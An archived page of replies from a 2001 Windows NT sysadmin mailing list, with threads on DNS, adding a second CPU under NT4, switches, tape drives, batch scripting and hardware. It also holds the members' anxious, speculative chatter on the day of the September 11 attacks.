  Good luck, 
  Richard 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
This e-mail is intended only for the 
addressee named above. This e-mail may contain confidential or 
privileged 

RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack



Just 
heard there's a nutball with a bomb and a gun in Memphis. 


  -Original Message-From: Bart Southworth 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
  11, 2001 10:34 AMTo: NT System Admin IssuesSubject: RE: 
  NewYork Terrorist Attack
  That 
  would be difficult. We did take care of the last one, here in good old 
  Indiana. But the thought. Wow. The taliban is being 
  "sketchy," no denial. I'm at a loss. Anyone want to explain this 
  to my 6  4 year olds? The younger is asking now. I dread the 
  eldest coming home from school. I hope you have luck with yours, 
  Andrew.
  
  I 
  read on another list, that there may be a coordinated internet "worm" 
  attack. (Not confirmed)
  
  -Original Message-From: 
  Andrew Baker [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
  11, 2001 12:12To: NT System Admin IssuesSubject: RE: 
  NewYork Terrorist AttackEspecially when we've had Internal 
  Terrorism before.
  I'm almost hoping it's an external attack, because we 
  will not be able to deal with an internal attack of this 
  magnitude.
  


- ASB
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: DNS problem

2001-09-11 Thread RZorz



did 
they use the same namespace as their domain name?

  -Original Message-From: Luke Brumbaugh 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
  10:40 AMTo: NT System Admin IssuesSubject: RE: DNS 
  problem
  Did 
  they hardcode the address in the dns?
  And 
  is it replicated to all the nameservers registered.
  And 
  is the ISP letting it go out the firewall?
  
  
-Original Message-From: Matt Moore 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 
2001 1:39 PMTo: NT System Admin IssuesSubject: DNS 
problem
A customer has a pure 2000 network. From the 
insidewe are able to resolve all names internal and external with the 
exception of their web page which is hosted off site. The internal 
DNSforwarders are set totalk to the ISP's DNS servers. All 
of the ISP's DNS records are correct. The ISP hosts their web 
page. Anybody got any ideas.
Matt MooreMCSE, MCP+I, NCSS, 
HPhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  Enterprise Channel Management Software for 
  Manufacturers 
  Visit us at http://www.ultryx.com 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: Message



I'd 
rather wait and see. 9/11 is the anniversary of the death of Allende in 
Chile. The head of that drug cartel was deported to the US, and he's got 
money. It's too early to tell. 

  -Original Message-From: Allen Crawford 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:42 
  AMTo: NT System Admin IssuesSubject: RE: NewYork 
  Terrorist Attack
  
  Retaliation 
  for executing McVey?
  
  -Original 
  Message-From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 10:57 
  AMTo: NT System Admin 
  IssuesSubject: RE: NewYork 
  Terrorist Attack
  
  unlikely, yes. 
  But Oklahoma City was done by an American. Wow, did I just get a deja vu 
  while typing this. 
  -Original 
  Message-From: John 
  Hornbuckle [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 8:53 
  AMTo: NT System Admin 
  IssuesSubject: RE: NewYork 
  Terrorist Attack
  That seems very, very 
  unlikely. I heard earlier that a Palestinian group had claimed responsibility, 
  and my hunch is that such a group (whether or not it was this specific group) 
  is to blame.
  John 
  HornbuckleNetwork ManagerTaylor County School District318 North 
  Clark StreetPerry, FL 32347 
  
  
  -Original 
  Message-From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 11, 2001 11:43 
  AMTo: NT System Admin 
  IssuesSubject: RE: NewYork 
  Terrorist Attack
  You can't retaliate 
  for the sake of retaliating. It could be Americans.
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack



Hopefully you'll never have to find out. 

  -Original Message-From: Murray Binette 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 
  2001 12:11 PMTo: NT System Admin IssuesSubject: RE: 
  NewYork Terrorist Attack
  I 
  find it hard to beleive that the US would give a rats ass if something similar 
  happened in Toronto or Edmonton.
  
  
  
-Original Message-From: Paul Armstrong 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 
2001 12:13 PMTo: NT System Admin IssuesSubject: RE: 
NewYork Terrorist Attack
How is this relevant? Well, I know some people who work in the WTC 
who are sys admins and I haven't been able to contact them since the crisis. 
Obviously there are others who are sys admins who probably lost there lives 
in this situation. I take it you know noone in NYC and probably dont 
care. I guess I wouldn't be wrong if the roles were reversed and this 
happened in your home town and you were caught in the middle of this thing 
and I didn't care. If you dont like the posts relating to this event, you 
could always filter them or simply unsubscribe, who cares since you have no 
sympathy for what has happened today! If this situation gets larger than 
what it already is and it starts to effect you, you will then find out the 
relevance to this list!!

  -Original Message-From: Murray Binette 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 
  2001 1:43 PMTo: NT System Admin IssuesSubject: RE: 
  NewYork Terrorist Attack
  How is this relevant to NT system 
  administration?
  
-Original Message-From: Paul Armstrong 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
11, 2001 11:18 AMTo: NT System Admin 
IssuesSubject: RE: NewYork Terrorist 
Attack
Basically, 40K people work in the Towers and there is estimated 
200K people who pass thru the towers. most people who live in NJ and 
work in NY have to take the path trains to get into the city which 
passes right under the WTC! i actually witnessed the first plane hitting 
the tower from Brooklyn while waiting for a cab. I am now at work and 
trapped in the city because all trains  buses are locked 
down.

  -Original Message-From: Rogers, Jeff L 
  (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, 
  September 11, 2001 11:41 AMTo: NT System Admin 
  IssuesSubject: RE: NewYork Terrorist 
  Attack
  I heard 50+ thousand
  
-Original Message-From: David N. Precht 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
11, 2001 10:44To: NT System Admin 
IssuesSubject: RE: NewYork Terrorist 
Attack
any stats on how many people work/live in the WTC and/or 
area? i estimated around 25k-50k ...

  -Original Message-From: 
  MLewis [mailto:[EMAIL PROTECTED]]Sent: Tuesday, 
  September 11, 2001 11:37To: NT System Admin 
  IssuesSubject: RE: NewYork Terrorist 
  Attack
  Both World Trade Center buildings have fallen. There 
  is only rubble where these historic structures 
  stood.
  
  Marcella D. 
  Lewis
  Network Administrator
  [EMAIL PROTECTED]
  
  
  "Excellence 
  is in the details. Give attention to the details and excellence 
  will come." (Perry Paxton)
  
-Original Message-From: 
Rogers, Jeff L (OM) 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, 
September 11, 2001 11:30 AMTo: NT System Admin 
IssuesSubject: RE: NewYork Terrorist 
Attack
Could you confirm either more or less whether 
the structures are basically now grade level? 
-Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 10:24 
To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack 
Im about 40 blocks from the towers and we were 
all told we can go home but all the 
bridges and subways are closed so here i am trying to 
figure out a way to get to 
brooklyn. 
Roman Bogdanov Head of 
IT Support Jnana Technologies 
Corp. www.jnana.com 212-560-9151 ext. 202 212-560-9066 fax 
-Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 11:24 
AM 

RE: Installing second CPU

2001-09-11 Thread RZorz
Title: Installing second CPU



use 
UPTOMP. Or use the snip below from Anthony Bennett:

Forget UPTOMP.
I have successfully used the following technique as provided by 
Microsoft:
1) Put 2nd processor in
2) Regurgitated from archive (courtesy of Dave Nestor from 
Microsoft):

I would recommend against 
using Uptomp.exe unless you have revision 3 of the NT4 Resource Kit. A simpler way to do this is 
to edit the hidden, read-only file called 
setup.log that's in the \WINNT\Repair directory and reapply your current service pack. Update.exe from the 
service pack relies on information in 
setup.log for the proper files to install, it does not do any discovery process, so if the wrong information 
is in that file, a dual processor computer 
can be blindly returned to single processor mode. 
Six files in the System32 directory determine NT's multiprocessor capability. NT is multiprocessor by default which is why we load 
the mutliprocessor kernel during a fresh install. Later during 
that install, if
only a single processor 
is found, we install hal.dll or halapic.dll and 
rename it to hal.dll and copy in ntoskrnl.exe. Setup will also 
"smash locks" on four other files, 
kernel32.dll, ntdll.dll, win32k.sys and 
winsrv.dll to make them single processor versions. Failure to alter 
those four files will burden a single 
processor computer with about a 5% 
performance 
hit.

Therefore, the manual way 
to do an upgrade is, from a command prompt only 
(using a GUI will give you an access violation) rename the current six 
files to *.old and copy in fresh versions 
of
kernel32.dll
ntdll.dll
win32k.sys
winsrv.dll
halmps.dll and rename it to 
hal.dll
ntkrnlmp.exe and rename it to 
ntoskrnl.exe
Of course, these had 
better be files from your current service pack and not from the original CD. Now you're left with the problem of 
the setup.log file containing single 
processor 
information. The next service pack install will move you back to
a single processor 
version of NT. So edit that file with the following information, being careful to enter the 
correct checksums which will tell the next service pack not to "smash locks" on four 
files.
\WINNT\system32\ntoskrnl.exe = 
"ntkrnlmp.exe","e76ab"
\WINNT\system32\hal.dll = 
"halmps.dll","1a01c"
\WINNT\system32\kernel32.dll = 
"kernel32.dll","5b7f8"
\WINNT\system32\ntdll.dll = 
"ntdll.dll","59c19"
\WINNT\system32\win32k.sys = 
"win32k.sys","132603"
\WINNT\system32\winsrv.dll = 
"winsrv.dll","37b4e"
Do a notepad search on 
the individual file names to find these lines, since they are not together in setup.log. OK, now 
you're done. Or, edit the setup.log first 
and reapply your current service pack. That's the quick way to do this.
=
Cheers,
Anthony Bennett



  -Original Message-From: Blake R. Fowkes 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 11:41 
  AMTo: NT System Admin IssuesSubject: Installing second 
  CPU
  I am wanting to install a second processor in my 
  Dell 1400 server. Can anyone point me in the right direction as to what 
  I will need to do to Windows NT 4.0 server to make sure I do not mess things 
  up.
  Thanks, Blake Fowkes Waid and Associates 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Attack and Gas Prices

2001-09-11 Thread RZorz
Title: RE: Attack and Gas Prices





blackberry would do that.


-Original Message-
From: Murray Freeman [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 2:43 PM
To: NT System Admin Issues
Subject: RE: Attack and Gas Prices



Hey, do you have a computer in your CAR I want one of those.


Murray F.


-Original Message-
From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 4:34 PM
To: NT System Admin Issues
Subject: RE: Attack and Gas Prices



I just stopped at our local Cumberland Farms gas station here in
Southeastern MA and the price is unchanged. Regular unleaded is at
$1.37.


Mark Kelsay


-Original Message-
From: David James [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 4:11 PM
To: NT System Admin Issues
Subject: Attack and Gas Prices



Can anyone confirm that gas prices are going up around the country? 
Supposedly it's around $6.00 a gallon already in some places...




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Silicon Valley salary

2001-09-11 Thread RZorz
Title: RE: Silicon Valley salary





try www.salary.com. Should be lucrative for you. 



-Original Message-
From: Markus Laker [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 2:56 PM
To: NT System Admin Issues
Subject: Silicon Valley salary



Once the authorities get around to processing visa applications again, and
once the airports reopen, my employer is planning to move me from its UK
office here in Bracknell to its San Jose office for a couple of years.
Marvellous timing, I know.


Salary negotiations are beginning in earnest. Most of the Californian job
sites I can find don't mention salaries these days (surprise, surprise).
What does a competent C++ developer earn in Silicon Valley these days?


Thanks and regards,


Markus



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Hub Recommendations

2001-09-10 Thread RZorz
Title: Message



I 
agree that getting switches is the way to go. I've got a HP which is kind 
of nice because of the expansion capability. You just add 8-port modules 
as needed. 

  -Original Message-From: Don Ely 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 
  12:13 PMTo: NT System Admin IssuesSubject: RE: Hub 
  Recommendations
  Cisco Catalyst Series Switches are some of the best and most 
  reliable. Managed switches are better if you're looking to trap SNMP 
  traffic.
  
  D
  

-Original Message-From: Roger Wright 
[mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 
12:09 PMTo: NT System Admin IssuesSubject: Hub 
Recommendations
I need to 
replace one of my hubs (the smoke leaked out of the box) and would 
appreciate some recommendations. I'd like to get three 24 port 
auto-sensing 10/100 units.This will give me 8-10 spare ports for 
expansion in our 65-node network.

What is the 
difference between a hub and a managed hub? Should I consider 
installing switches rather than plain 
hubs?

Brand 
recommendations? We've been using Intel units but I have no loyalty to 
any particular product line at this time.


Roger Wright
Southern Commerce Bank
___

Among economists, the real world is 
often a special case. --Horngren 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
___
NOTICE: The information contained in this 
electronic message is considered privileged and confidential under Florida 
Statutes 455.251 and 3905.017. It is intended solely for the use of the 
recipient named above. If the reader is not the recipient named above, you 
are hereby notified that any dissemination, distribution, copying or 
disclosure of the contents of this message is prohibited. If you have 
received this e-mail message in error, please immediately notify the sender 
and destroy the original message. 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Hub Recommendations

2001-09-10 Thread RZorz
Title: Message



Just 
turn it on. IP address would be used for management. 

  -Original Message-From: Roger Wright 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 1:26 
  PMTo: NT System Admin IssuesSubject: RE: Hub 
  Recommendations
  Is a 
  switch a "connect and go" device or would I need to do some 
  configuration? Does it require an IP address?
  
  
  Roger Wright
  Southern Commerce Bank
  ___
  
  
  IRS: Income Removal 
  Service 
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 
2001 3:17 PMTo: NT System Admin IssuesSubject: RE: Hub 
Recommendations
I 
agree that getting switches is the way to go. I've got a HP which is 
kind of nice because of the expansion capability. You just add 8-port 
modules as needed. 

  -Original Message-From: Don Ely 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 
  2001 12:13 PMTo: NT System Admin IssuesSubject: RE: 
  Hub Recommendations
  Cisco Catalyst Series Switches are some of the best and most 
  reliable. Managed switches are better if you're looking to trap SNMP 
  traffic.
  
  D
  

-Original Message-From: Roger 
Wright [mailto:[EMAIL PROTECTED]] Sent: Monday, September 
10, 2001 12:09 PMTo: NT System Admin 
IssuesSubject: Hub Recommendations
I need to 
replace one of my hubs (the smoke leaked out of the box) and would 
appreciate some recommendations. I'd like to get three 24 port 
auto-sensing 10/100 units.This will give me 8-10 spare ports 
for expansion in our 65-node network.

What is the 
difference between a hub and a managed hub? Should I consider 
installing switches rather than plain 
hubs?

Brand 
recommendations? We've been using Intel units but I have no 
loyalty to any particular product line at this time.


Roger Wright
Southern Commerce Bank
___

Among economists, the real world 
is often a special case. --Horngren 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
___
NOTICE: The information contained in this 
electronic message is considered privileged and confidential under 
Florida Statutes 455.251 and 3905.017. It is intended solely for the use 
of the recipient named above. If the reader is not the recipient named 
above, you are hereby notified that any dissemination, distribution, 
copying or disclosure of the contents of this message is prohibited. If 
you have received this e-mail message in error, please immediately 
notify the sender and destroy the original message. 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  ___
  NOTICE: The information contained in this 
  electronic message is considered privileged and confidential under Florida 
  Statutes 455.251 and 3905.017. It is intended solely for the use of the 
  recipient named above. If the reader is not the recipient named above, you are 
  hereby notified that any dissemination, distribution, copying or disclosure of 
  the contents of this message is prohibited. If you have received this e-mail 
  message in error, please immediately notify the sender and destroy the 
  original message. 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Backup Device Advice?

2001-09-07 Thread RZorz
Title: RE: Backup Device Advice?





I'm still using a Travan, which comes in a 20gig version. I've also got a VXA unit that I haven't put into production. It was about $800 at the time. 

-Original Message-
From: Owsley, Kenneth [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 3:13 PM
To: NT System Admin Issues
Subject: RE: Backup Device Advice?



DLT. Thats the only way to go. You can get an Quantum DLT 8000 for around
$3,500 or so. Thats rated at 80GB with compression, but I typically get 75
or so GB on a tape. They are alos fast. Much faster than the helical scan
technologies.


-Original Message-
From: Murray Binette [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 3:14 PM
To: NT System Admin Issues
Subject: Backup Device Advice?



Our 4GB Travan tape drive is starting to get a bit for our Small
Business Server (NT 4.0 sp6). We're looking at something in the 20+GB
range. If anyone has any advice regarding. different types of tape drive
technology (DDS vs. QIC vs. DAT) I'm not to sure what the advantages
of one format over the other are. 




Thanks!



Murray Binette
Systems Administrator
Cybertech Automation Inc.


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Test Whether Variable Exists

2001-09-07 Thread RZorz
Title: FW: Test Whether Variable Exists



He's 
probably having a problem with his e-mail. Unsubbing him isn't the 
answer. I think there was a bug in OL caused by IE if I'm not mistaken, 
for example. 

  -Original Message-From: EALES, Jack / RSAIFS - IOM 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, September 07, 2001 6:35 
  AMTo: NT System Admin IssuesSubject: RE: Test Whether 
  Variable Exists
  Stu - can you get this guy unsubbed before he drives us all mad? A 
  blank response to every posting is getting a little annoying 
  ;-)
  
  Cheers
  Jack
  
-Original Message-From: Pete Karhatsu 
[mailto:[EMAIL PROTECTED]]Sent: 07 September 2001 
14:17To: NT System Admin IssuesSubject: FW: Test 
Whether Variable ExistsTHIS MESSAGE 
ORIGINATED ON THE INTERNET - Please read the detailed disclaimer 
below.--
-Original Message- From: 
Colin Leeson [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 06, 2001 9:48 PM To: NT System Admin Issues Subject: RE: Test 
Whether Variable Exists 
Try this Date /t 
test.txt ...and notice the space after the 
date 
Col 
-Original Message- From: 
Andrew S. Baker [mailto:[EMAIL PROTECTED]] 
Sent: Friday, 7 September 2001 11:44 
To: NT System Admin Issues Subject: 
RE: Test Whether Variable Exists 
Type either of the following at the command line: 

SET TEST= HELLO 
or 
SET TEST=HELLO (with a trailing 
space) 
Now type: 
ECHO "%TEST%" 
== 
ASB - http://www.ultratech-llc.com/KB/?File=~MoreInfo.TXT 
== 
"Little progress can be made by merely attempting to 
repress what is evil. Our great hope lies in 
developing what is good." -- President Calvin Coolidge (1872-1933). 
~~~ Keystrokes are an Endangered Species: http://www.shortkeys.com/ 
~~~ 
-Original Message- From: Correa, Andre [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 06, 2001 8:17 PM 
To: NT System Admin Issues Subject: RE: Test Whether Variable Exists   How do 
you set an environment variable with a space?? I have never seen that   Andre Correa Senior 
Manager/Information Technology Lexitron, 
Inc (201) 892-6399   -Original Message- 
From: Andrew Baker [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 06, 2001 7:14 PM 
To: NT System Admin Issues 
Subject: RE: Test 
Whether Variable Exists  Using double quotes is best because the command won't break if 
the environment variable contains a 
space   
- ASB-Original Message- From: 
Correa, Andre [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 06, 2001 1:02 PM 
To: NT System Admin Issues Subject: RE: Test Whether Variable Exists   I 
believe that IF DEFINED only works on NT boxes, not 95/98. If it is 
an all NT environment, then it is OK. 
Otherwise, use syntax as follows: 
 If not {%somevar%}=={} 
echo Variable exists  The { sign can be replaced with quotes, but to each their 
own. The double = is 
very important, otherwise you will tear out every last strand of 
hair on your head   HTH   Andre Correa Senior 
Manager/Information Technology Lexitron, 
Inc (201) 892-6399   -Original Message- 
From: Torres, Edgar (GEP) [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 06, 2001 12:26 
PM To: NT System Admin 
Issues Subject: RE: Test Whether 
Variable Exists  if 
defined MYVAR echo It exists!  __ Edgar Torres 
  -Original Message- From: 
Simon Butler [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 06, 2001 12:22 PM 
To: NT System Admin Issues Subject: Test Whether Variable Exists   Hi, This should be an easy one but I 
cannot find the answer after hours of 
searching. I am looking for a way that I can test 
whether a variable exists and then take action 
on the result. This is for use in a login script 
- not a KIX script. I don't want to add, change 
or delete the variable in anyway, just check 
whether it is there or not. Can anyone 
suggest a way? Thanks, Simon Butler.  
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm--The 
following message has been automatically added by the mail gateway to comply 
with a Royal  Sun Alliance IT Security requirement:As this 
email 

RE: Compaq Evo Workstation W6000

2001-09-07 Thread RZorz
Title: RE: Compaq Evo Workstation W6000





I've got an old HP Netserver, an IBM Netfinity 3000 and a whitebox from U-tron. They all work fine. The whitebox was significantly cheaper (like maybe 1/2 the price at the time for a compatible Dell, HP or Compag).

-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 07, 2001 11:32 AM
To: NT System Admin Issues
Subject: RE: Compaq Evo Workstation W6000



He doesn't need a laptop.


Current setup. Toshiba laptop for all applications and clone box NT server
for file/print services. The NT server is useless and the laptop is falling
apart. He wants to consolidate everything onto one computer. He wants disk
mirroring capability (which I'm not even sure the Ultra160 controller can
even do - still reading). He wanted something that was dual processor
capable (even though I know he'll never use it or need it) and he wants
something that will last awhile. Something 'cheap' wasn't one of his
concerns. He runs a myriad of applications ranging from Office, Quicken,
Vendor specific software and diagnostic software for ATM's and Kiosks (sp?),
and countless others. He's an agent for NCR so he sells ATM's, Kiosk's, Cold
Imaging solutions. 


I know the Evo would be more machine than he needs. I guess the better thing
to do is ask for recommendations based on his needs/wants.


Dual processor capable
Disk mirroring - hardware (obviously)


He basically wants a super computer that will fit under his desk. What would
you all recommend based on your experiences with different brands?





Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell  Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] 



-Original Message-
From: Kevin Miller [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 07, 2001 9:56 AM
To: NT System Admin Issues
Subject: RE: Compaq Evo Workstation W6000



From a laptop to a server/? Sounds like more info on his business size
and what he does would help? Buy him a nice dell laptop with a fire wire
CDrw. sounds like my suggestion. Or if he does not need a laptop, get
him a cheap HP machine.


-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]] 
Sent: Friday, September 07, 2001 1:40 PM
To: NT System Admin Issues
Subject: Compaq Evo Workstation W6000



Hey folks, 


My old man runs his own business out of his home and he's looking to get
some new hardware. He currently runs all of his applications off of a 4
year old Toshiba laptop. He wants something that'll be robust, fast,
provide some level of fault tolerance, and be reliable. Most of my
experience is with Compaq so I'm starting with them. 


The machine I'm looking at is a Compaq Evo Workstation W6000. Specs:
Intel Xeon 1.7Ghz (dual proc. capable), 512mb RDRAM/800, Integrated
Ultra160 SCSI Drive - (1) 18.2gb/15k Ultra 160 SCSI drive and (1) 18.2
WideUltra3 SCSI 15k, cd, nic, blah, blah, running Win2k Pro.


First, does anyone have any experience with this particular model? Likes
- Dislikes? Second, there's no option for an internal tape drive, so
what external models would you recommend? (to be safe, I'd go with tape
storage equal to the amount of disk space)


Thanks in advance for your suggestions, insight, warnings, etc...


Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell  Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED]
mailto:[EMAIL PROTECTED] 
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential
and/or privileged information intended only for the addressee. If you
have received this communication in error, please call us immediately at
(907) 561-1250 and ask to speak to the sender of the communication.
Also, please e-mail the sender and notify the sender immediately that
you have received the communication in error.


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential and/or
privileged information intended only for the addressee. If you have received
this communication in error, please call us immediately at (907) 561-1250
and ask to speak to the sender of the communication. Also, please e-mail the
sender and notify the sender immediately that you have received the
communication in error.


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: email to replace fax?

2001-09-07 Thread RZorz
Title: RE: email to replace fax?





Are you trying to e-mail or fax? If e-mail, and your database of recipients is ODBC-compliant, then try the Gammadyne Mailer - www.gammadyne.com. You can create projects based on queries. 


-Original Message-
From: thomas smith [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 07, 2001 2:12 PM
To: NT System Admin Issues
Subject: email to replace fax?



I currently do my own price requests for equipment. (Purchasing does
everything EXCEPT computer gear.) I use WinFax Pro. I have a database of
recipients, organized into groups, based on hardware/software/whatever for
which I require pricing. Using WinFax Pro requires that I use my
modem. This is currently NOT a problem.


But I HAVE been thinking... Perhaps I could accomplish the same thing via
email. I personally don't use Outlook...yet. I'm still using Eudora. But
from what I've seen, it doesn't APPEAR that either is particularly
conducive to creating groups to accomplish the same thing.


So I've been wondering... Assuming I'm correct about neither being
particularly suited to doing what I'm wanting to do, does anyone know of
some kind of email app that would allow this? (I know that WinFax Pro
can interface to email. And I tried it...once. It sucks...assuming I was
using it as designed...which I think I was.) Other than my Eudora client,
Outlook or Exchange Server, I am ignorant of email package(s) for ANYTHING.


Thanks in advance, you help is appreciated. :)


-
Thomas Smith
IT Supervisor, AKA: Systems Administrator,
Network Administrator, Database Administrator,
Security Administrator, Email Administrator,
Telecommunications Administrator, Webmaster
Henry Co Water and Sewerage Authority
770.957.6659 (v) / 770.898.8416 (f)
[EMAIL PROTECTED]



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Restore Question

2001-09-06 Thread RZorz



What's 
wrong with their support? As much as I hate to admit it, they've always 
come thru for me.Of course I hesitate to ante up $250 for support 
calls, but it's been more cost effective than some of the support I'm paying for 
3rd party products. 

  -Original Message-From: Daniel Burns 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 
  06, 2001 10:49 AMTo: NT System Admin IssuesSubject: Re: 
  Restore Question
  LOL...Microsoft has support?? You mean other than 
  Technet and User Groups?? Get out of here!
  Dan
  
  
  
- Original Message - 
From: 
Correa, 
Andre 
To: NT System Admin 
Issues 
Sent: Thursday, September 06, 2001 
12:18 PM
Subject: RE: Restore Question


Cheapest 
way and maybe second fastest would be to install 2000 and then use Dcpromo 
to demote from Domain Controller to member server. Absolute fastest way might be to use 
U-Promote (third party utility), but Microsoft says they will discontinue 
support on a NT server that has been Upromoted (Oh no, what will I do without 
Microsoft Support??? takes 
tongue out of cheek)


Andre 
Correa
Senior 
Manager/Information Technology
Lexitron, 
Inc
(201) 892-6399

-Original 
Message-From: Daniel 
Burns [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 06, 2001 
12:58 PMTo: NT System 
Admin IssuesSubject: 
Restore Question

Has anyone 
ever tried to restore a machine back to it original state, except, BIG 
exception, without making it a BDC? I am want to upgrade and old 
imaging system, that doesn't have support...long story, but I don't want 
this machine to be a DC anymore. I want to move to a Windows 2000 
Network and I know I can do a mixed mode, but if I could do this, my job 
would be much easier. Weird question I knowbut has anyone ever 
tried this??
Thanks,
Dan

http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: IP Justification

2001-09-06 Thread RZorz
Title: RE: IP Justification





Sprint just gave me what I needed. In hindsight, I wish I could've just used NAT to simplify the process for the next time. 

-Original Message-
From: David James [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 06, 2001 11:48 AM
To: NT System Admin Issues
Subject: IP Justification



I'm using around 8 IP's right now, but my ISP is going bye bye at the end of
this month. I'd like to have a block of IP's from the new ISP, just in case
I need more etc. etc. What kind of ammunition do you guys use to justify
your need for IP's? We currently have 128, but that's way too many. I can
take care of everything I need with less than 32 for now, but you never
